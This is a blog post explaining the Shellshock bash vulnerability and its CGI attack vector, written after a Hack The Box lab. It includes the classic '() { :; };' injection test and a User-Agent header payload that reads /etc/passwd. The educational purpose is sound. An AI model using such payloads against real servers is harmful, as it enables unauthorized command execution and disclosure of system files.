Open in app

Sign in

Write

Sign in

Shellshock Attack (CGI Vector)

Nave Ben Naim
6 min readJul 13, 2021

--

24 September 2014, the day that the attack disclosed. Every Security Researcher in his company ran to update his bash version or something like that. But with all due respect to Shellshock, that’s not why we’re gathered for because we’re here to talk about the actual attack.

You can’t understand the Shellshock CGI vector attack without knowing what is that CGI and how it work.

What is that CGI — Common Gateway Interface?

Theoretically:

Think about a website from the 80's. It looks like that: http://itcorp.com/

Besides the fact that it’s causing pain in my eyes, it’s also not attracting people. What I want you to understand is that old websites was static and ugly, which means that the website content couldn’t changed unless the website’s developer modified the “.html” file. All this until the early 1990s — when CGI came to the world. CGI allows a webpage to be more interactive to users, so the website’s owner can add more feature to the website like: The user’s name is appear in the side of the screen, manipulate user’s input, user-friendly, etc...

Technically:

CGI is web technology and protocol that defines a way for a web server to interact with external applications like: PHP, Perl, sh, etc… As we said before, CGI is what enable us to make our website dynamic.

Terminology: CGI — interface, CGI scripts — The applications that allow the webpage to be dynamically those application wrote in python, perl, php, etc…

So with that terminology, we can say that: CGI is an interface between the webserver (you can think about that as ‘The static webserver’) and the additionally installed applications that generating dynamic web content.

How it works?

The webserver doesn’t respond only with the existing HTML file, but executes an application when it transfers the HTTP request data → The application/script accepts and process the arguments that passed with the request → The webserver returns a response to the request while forwarding the generated HTML code.

The following image describe that perfectly:

/cgi-bin/

All the CGI scripts we talked about stored in that directory. Every time that the sever need to use some script for process the data he turns to this directory to the specific executable script with the user request → The generated data sent by the application to the web server → The server will transfer the data to the client, still in HTML form.

bash — Environment Variable Intro

‘Why we learn bash for shellshock?’ is a good question. So from the name of the attack — Shellshock we can infer why we need some bash knowledge. But all I can say now is that shellshock actually take advantage of bash misconfiguration of environment variables & bash functions.

Function Syntax

Well, bash like many languages also got functions:

func() {
    echo "FOO"
}
IN ONE LINE:
func_one() { echo "FOO"; }
func_two() { /bin/cat /etc/passwd; }

As you can see the first function just print the word “FOO” and exit, the second is print the ‘passwd’ file of the system.

Environment Variable

Those variables are crucial. Why? because most of the programs your system run are based on those variables. You can understand why, because the variables are: The shell you use, Your username, Your home directory, The path to your executables on the machine, etc… (you can see the whole list by typing ‘env’ on your machine shell)

Set Environment Variable:

#Create a shell variable within our current session:
MY_VAR="Hi There"# Then export the variable, so the child shell can use it:
export MY_VAR#Create a shell function:
func () { echo "Hello world"; }#Create a shell function that returns nothing:
func () { :; }#Export the function properly (it'll be important in the future):
export -f func

Shellshock CGI Attack — What is all about?

We already talked about CGI, CGI is the interface between the webserver to the applications that make the webserver dynamic and those applications AKA cgi scripts. So Shellshock on CGI is an exploitation of old version of bash that save environment variables in incorrect way.

What do you mean: “save environment variables in incorrect way”

As we said before, to save shell functions as environment variable in a proper way you need to type ‘export -f’ and to save a shell variable as environment variable you need to type just ‘export’, but bash version 1.0.3–4.3 forget that… The main problem is you can save a shell function as a shell variable, but still the bash will treat to that variable as function and more than that — the bash wouldn’t stop where the function is defined to end, but still continue after it (after the ‘}’ tag) and read-execute more and more commands.

#Example:
MY_VAR='() { :; }; echo Vulnerable' bash -c 'echo "Start A new child shell"'

We can see that we tell the bash to start a new command by typing
';' there. Also we start a new child shell with 'bash -c' because this shell looks at the environment variables, sees 'MY_VAR', which looks like it meets the constraints it knows about what a function definition looks like, and it evaluates the line, unintentionally also executing the echo…

CGI + Save environment variables = Shellshock

With CGI the web server passes environment variables to a bash script (AKA cgi script or The applications, who located in /cgi-bin/). For example, HTTP_USER_AGENT might be set to the contents of your user agent. This means that if you spoof your user agent to be something like '() { :; }; echo /etc/passwd', when that shell script runs, echo /etc/passwdwill be executed and returns as a response.

But wait, it’s not fully true! because when CGI process the environment variables and give us HTTP response with the HTTP headers we sent to him, we’ll write the ‘new header’ that we sent with a blank line OR HTTP Header, otherwise we’ll get an ‘Apache error’ that the HTTP Header syntax is incorrect.

EXAMPLE:

Look at the apache error that I mention above:

We also have the option to sent it with HTTP Header and not with blank line (I mean ‘echo;’) :

Also, not that we don’t specify ‘bash -c’ because the cgi script gonna doing this for us.

In conclusion, I’m really hope that now you understand the Shellshock attack and CGI Shellshock attack in particular. This article written because I solved the ‘Shocker’ machine in ‘Hack The Bok’ and really want to know and understand what is really happening in the background of the Shellshock attack on webservers with CGI.

Also — Check out my GitHub and my LinkedIn account, Thank you all! Nave. #PICKLERICK

Sign up to discover human stories that deepen your understanding of the world.

Shellshock
Cgi
Bashdoor
Shocker Htb
Shellcode

--

--

Nave Ben Naim
Nave Ben Naim

Written by Nave Ben Naim

1 Follower
1 Following

Cyber & Innovation fan. Specialized in PT.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech